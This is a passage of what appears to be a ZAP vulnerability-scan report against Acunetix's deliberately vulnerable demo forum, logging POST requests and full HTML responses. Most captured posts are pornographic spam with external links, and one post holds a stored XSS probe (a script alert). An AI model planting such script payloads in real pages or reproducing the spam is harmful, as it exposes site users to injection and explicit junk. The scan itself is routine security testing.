parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3375 |
| Response Body - size: 3,375 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3437 |
| Response Body - size: 3,437 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3468 |
| Response Body - size: 3,468 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3357 |
| Response Body - size: 3,357 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3406 |
| Response Body - size: 3,406 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3109 |
| Response Body - size: 3,109 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3356 |
| Response Body - size: 3,356 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td 